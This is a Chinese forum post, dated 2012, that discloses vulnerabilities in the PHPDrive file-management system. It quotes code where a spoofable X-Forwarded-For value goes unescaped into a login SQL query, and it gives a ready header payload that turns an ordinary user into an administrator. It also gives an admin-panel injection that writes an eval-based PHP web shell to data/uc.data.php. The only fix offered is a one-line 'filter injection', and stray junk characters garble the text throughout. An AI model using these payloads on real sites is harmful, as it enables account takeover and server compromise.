PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等' w$ P4 d7 C0 A% r1 C( W0 W- K% {
( i0 K( P: L* e+ @5 P! Pincludes/user.lib.php
7 C" {1 L8 ~ d ~3 n+ \, Z行87
" x- F" D& w' m& S function get_ip() {2 F7 m2 i$ z! l3 |2 b
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.2 J3 Y4 V- Y2 O; z4 \# x. k% [
在用户注册与登录 处module/disk/account.lead.php4 J& g- M: T! m; ?% d. v$ J
198行 1 |. _7 [7 e! j
//更新本次登录IP和时间
0 q; G7 g7 A. i5 P) }# } $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
& O" ^! M; q& T# S( G由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限$ z4 L& `) G) i4 U
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
0 ~3 C( O0 R# h( D W0 p7 E: m后台getshell:9 n0 e5 O: k( H I/ E+ w- |: x
在UCenter设置处,将UC数据库登录名填写为
" v' s5 v9 W5 ] D/ c , m- @4 A6 L3 }4 H& w& y
root’);eval($_POST[DisKill]);?>/*5 V- s9 P/ T! _1 v3 _
可以得到一个shell,位置在 data/uc.data.php! x2 U& H; ?+ Y% ?+ Q
6 O) [+ A& k4 G9 l5 V v
修复:过滤注入% q/ l- b g- W% \/ d1 k
+ P- [* a0 A4 `/ x; v+ V" A0 R |
发表于 2012-12-31 09:18:34
收藏
支持
反对